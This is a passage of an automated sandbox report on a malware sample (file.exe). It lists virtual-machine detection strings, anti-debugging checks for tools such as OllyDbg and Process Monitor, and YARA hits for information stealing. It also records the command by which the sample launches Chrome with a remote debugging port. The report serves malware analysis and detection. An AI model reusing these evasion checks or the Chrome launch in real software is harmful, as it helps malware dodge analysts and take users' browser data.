Source: chrome.exe, 00000004.00000002.4185929523.00001D4001234000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mousea@
Source: chrome.exe, 00000004.00000003.3368460550.00001D4001E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4187529016.00001D4002004000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
Source: file.exe Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000004.00000002.4184097439.00001D4000D68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=29b2f272-1dd1-478d-a50c-31f31090d6be
Source: file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.4163006440.000000000145F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
Source: file.exe, 00000000.00000003.2197316136.000000000143D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2331644524.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4170206271.000001E299A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: file.exe, file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2281972536.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2282246731.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2281972536.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2284121493.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2281972536.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2282246731.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2281972536.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2284121493.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTR